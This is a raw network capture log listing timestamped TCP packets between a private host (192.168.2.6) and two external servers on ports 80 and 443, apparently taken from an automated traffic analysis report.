Sep 4, 2024 17:37:08.958992004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.959012032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.959032059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.959084034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.959121943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.959192038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.959202051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.959243059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.959254980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.959275007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.959289074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.959299088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.959310055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.959333897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.959877968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.959916115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960370064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960410118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960414886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960453987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960526943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960536957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960544109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960582018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960609913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960621119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960630894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960647106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960648060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960661888 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960681915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960731983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960742950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960752010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960761070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960769892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960771084 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960786104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960808992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.960834980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.960875034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.979511023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979542017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979573965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.979584932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.979588985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979623079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.979705095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979712963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979724884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979751110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.979765892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.979818106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979825974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979859114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.979892969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979908943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.979929924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.979943037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.980005980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.980041027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.980067015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.980078936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.980104923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.980118036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.980190992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.980207920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.980217934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.980228901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.980237007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.980252981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.980262995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981214046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981236935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981246948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981256962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981267929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981282949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981292009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981303930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981312990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981328011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981337070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981353045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981385946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981395960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981405020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981414080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981430054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981430054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981456995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981514931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981523991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981537104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981547117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981554985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981555939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981570005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981599092 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981646061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981667042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981683016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981687069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981712103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981723070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981897116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981909037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981916904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981925011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981935024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981936932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981945992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981956005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981962919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981966019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981976986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981983900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.981987000 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.981998920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982006073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982023001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982033968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982058048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982083082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982239962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982251883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982259989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982269049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982278109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982285976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982286930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982296944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982305050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982310057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982311964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982321978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982330084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982336044 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982338905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982345104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982352018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982362986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982372046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982372999 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982383966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982409954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982511044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982558012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982583046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982593060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982603073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982608080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982614040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982621908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982633114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982637882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982645035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982662916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982834101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982846022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982855082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982865095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982873917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982875109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982886076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982889891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982903004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982908964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982913971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982924938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982934952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982937098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982945919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.982947111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982971907 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.982985973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.983134031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983146906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983156919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983174086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.983186007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.983201027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.983308077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983319044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983328104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983339071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983350039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983355045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.983361959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.983372927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.983392000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.983409882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.006205082 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.006222010 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.006289005 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.006298065 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.006335974 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.007709980 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.007726908 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.007772923 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.007780075 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.007813931 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.009517908 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.009533882 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.009577990 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.009584904 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.009604931 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.009630919 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.009795904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.009813070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.009824038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.009841919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.009856939 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.009936094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.009946108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.009954929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.009963989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.009973049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.009974957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.009994984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.010020018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.010082960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.010092020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.010102034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.010111094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.010118961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.010130882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.010143995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.010215998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.010227919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.010258913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.010272980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011118889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011179924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011210918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011221886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011251926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011264086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011274099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011282921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011292934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011303902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011303902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011331081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011460066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011471987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011481047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011491060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011497974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011501074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011507988 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011512995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011521101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011523008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011534929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011543989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011552095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011579990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011696100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011706114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011718988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011728048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011730909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011737108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011743069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011750937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011754036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011775017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011775017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011784077 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011789083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011826038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011853933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011863947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.011887074 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.011897087 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012027979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012041092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012049913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012059927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012070894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012093067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012334108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012345076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012353897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012362957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012376070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012396097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012406111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012509108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012518883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012523890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012557983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012600899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012612104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012620926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012629986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012640953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012660027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012682915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012725115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012736082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012746096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012756109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012762070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012765884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012768030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012775898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012787104 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012793064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012815952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.012945890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012955904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012965918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012974977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012985945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.012989998 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013015032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013015032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013022900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013032913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013041019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013050079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013058901 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013060093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013072968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013084888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013087988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013101101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013101101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013122082 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.013791084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.013834953 CEST	49717	80	192.168.2.6	147.45.44.104
